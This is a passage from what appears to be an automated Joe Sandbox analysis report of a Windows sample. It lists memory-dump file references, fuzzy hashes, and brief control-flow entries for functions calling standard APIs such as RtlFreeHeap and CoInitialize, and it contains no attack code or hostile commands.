                                                                        • Associated: 00000000.00000002.1971408882.0000000000502000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971438825.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971465230.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971487223.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971487223.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971532844.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971566534.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971593396.000000000053A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971634100.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971682075.000000000053C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971706730.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971731572.0000000000540000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971756056.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971784520.000000000055B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971812557.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971838389.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971862301.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971882632.0000000000586000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971906478.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971929872.000000000059A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971950897.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971975495.00000000005A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971996406.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972018258.00000000005B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972038725.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972059818.00000000005BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972080474.00000000005BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972100695.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972120912.00000000005BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972145600.00000000005C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972165881.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972191922.00000000005DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972213332.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972234517.00000000005E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972254947.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972282409.00000000005F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972299826.00000000005F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972299826.0000000000607000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972356383.0000000000632000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972382013.0000000000633000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972382013.0000000000639000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972426573.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972448944.0000000000649000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4291b81db6c32e2835770c6ba1534a4050be3e920086b7a345352ce601317b94
                                                                        • Instruction ID: ae4762e7210c6a914a0ca4fb3fa91eeb84d6c935fc6b644dcbc3415dd65dd5d5
                                                                        • Opcode Fuzzy Hash: 4291b81db6c32e2835770c6ba1534a4050be3e920086b7a345352ce601317b94
                                                                        • Instruction Fuzzy Hash: 492139B490021A9FDB16CFA4CC90FBEBBB5FF4A305F144849E811BB292C735A915CB64
                                                                        Function 00383220 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 357 383220-38322f 358 3832ac-3832b0 357->358 359 3832a0 357->359 360 3832a2-3832a6 RtlFreeHeap 357->360 361 383236-383252 357->361 359->360 360->358 362 383254 361->362 363 383286-383296 361->363 364 383260-383284 call 385af0 362->364 363->359 364->363
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(?,00000000), ref: 003832A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1971119639.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                        • Associated: 00000000.00000002.1971096144.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971176071.00000000003A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971200091.00000000003AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971318082.00000000004AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971339079.00000000004AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971387871.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971408882.0000000000502000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971438825.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971465230.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971487223.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971487223.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971532844.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971566534.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971593396.000000000053A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971634100.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971682075.000000000053C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971706730.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971731572.0000000000540000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971756056.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971784520.000000000055B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971812557.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971838389.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971862301.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971882632.0000000000586000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971906478.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971929872.000000000059A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971950897.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971975495.00000000005A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971996406.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972018258.00000000005B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972038725.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972059818.00000000005BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972080474.00000000005BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972100695.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972120912.00000000005BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972145600.00000000005C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972165881.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972191922.00000000005DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972213332.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972234517.00000000005E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972254947.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972282409.00000000005F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972299826.00000000005F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972299826.0000000000607000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972356383.0000000000632000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972382013.0000000000633000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972382013.0000000000639000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972426573.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972448944.0000000000649000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: e426b6b037748598e3c3de6240546648b2bfd1306dbb74e6d50459f7c9f5e8ef
                                                                        • Instruction ID: e9bdf6fa7fbb025334a5ba1b74d00c6edf1aa9460a8737e655a876dc20bc401a
                                                                        • Opcode Fuzzy Hash: e426b6b037748598e3c3de6240546648b2bfd1306dbb74e6d50459f7c9f5e8ef
                                                                        • Instruction Fuzzy Hash: 85016D7454D3409BC702EF18E885A1ABBE8EF4AB00F054D5CE5C58B361D336DD60CB92
                                                                        Function 00385BB0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 367 385bb0-385be2 LdrInitializeThunk
                                                                        APIs
                                                                        • LdrInitializeThunk.NTDLL(003898C0,005C003F,00000002,00000018,?), ref: 00385BDE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1971119639.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                        • Associated: 00000000.00000002.1971096144.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971176071.00000000003A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971200091.00000000003AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971318082.00000000004AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971339079.00000000004AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971387871.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971408882.0000000000502000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971438825.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971465230.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971487223.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971487223.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971532844.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971566534.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971593396.000000000053A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971634100.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971682075.000000000053C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971706730.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971731572.0000000000540000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971756056.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971784520.000000000055B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971812557.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971838389.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971862301.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971882632.0000000000586000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971906478.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971929872.000000000059A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971950897.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971975495.00000000005A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971996406.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972018258.00000000005B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972038725.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972059818.00000000005BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972080474.00000000005BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972100695.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972120912.00000000005BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972145600.00000000005C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972165881.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972191922.00000000005DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972213332.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972234517.00000000005E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972254947.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972282409.00000000005F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972299826.00000000005F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972299826.0000000000607000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972356383.0000000000632000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972382013.0000000000633000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972382013.0000000000639000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972426573.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972448944.0000000000649000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                        • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                        • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                        • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                        Function 00352F6F Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 368 352f6f-352f87 CoInitializeSecurity
                                                                        APIs
                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00352F82
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1971119639.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                        • Associated: 00000000.00000002.1971096144.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971176071.00000000003A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971200091.00000000003AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971318082.00000000004AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971339079.00000000004AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971387871.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971408882.0000000000502000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971438825.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971465230.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971487223.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971487223.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971532844.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971566534.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971593396.000000000053A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971634100.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971682075.000000000053C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971706730.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971731572.0000000000540000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971756056.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971784520.000000000055B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971812557.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971838389.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971862301.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971882632.0000000000586000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971906478.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971929872.000000000059A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971950897.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971975495.00000000005A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971996406.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972018258.00000000005B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972038725.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972059818.00000000005BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972080474.00000000005BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972100695.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972120912.00000000005BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972145600.00000000005C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972165881.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972191922.00000000005DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972213332.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972234517.00000000005E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972254947.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972282409.00000000005F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972299826.00000000005F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972299826.0000000000607000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972356383.0000000000632000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972382013.0000000000633000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972382013.0000000000639000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972426573.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972448944.0000000000649000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeSecurity
                                                                        • String ID:
                                                                        • API String ID: 640775948-0
                                                                        • Opcode ID: b36a491352b090ca79e17cc9793328cef23df85e87d4aa9943e9043fbc850a22
                                                                        • Instruction ID: 74f944f2eb6ebacd737bedc5a592a5f4991005eed5a4058aef112f51ee9b6fdf
                                                                        • Opcode Fuzzy Hash: b36a491352b090ca79e17cc9793328cef23df85e87d4aa9943e9043fbc850a22
                                                                        • Instruction Fuzzy Hash: 19C092317D8305B4F43506086C63F0520085302F30F700B50B330BC1D089D53100861C
                                                                        Function 00352F10 Relevance: 1.3, APIs: 1, Instructions: 33COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 396 352f10-352f65 CoInitialize
                                                                        APIs
                                                                        • CoInitialize.OLE32(00000000), ref: 00352F60
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1971119639.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                        • Associated: 00000000.00000002.1971096144.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971176071.00000000003A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971200091.00000000003AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971318082.00000000004AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971339079.00000000004AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971387871.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971408882.0000000000502000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971438825.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971465230.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971487223.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971487223.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971532844.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971566534.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971593396.000000000053A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971634100.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971682075.000000000053C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971706730.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971731572.0000000000540000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971756056.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971784520.000000000055B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971812557.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971838389.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971862301.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971882632.0000000000586000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971906478.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971929872.000000000059A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971950897.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971975495.00000000005A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1971996406.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1972018258.00000000005B4000.00000080.00000001.01000000.00000003.sdmpDownload File
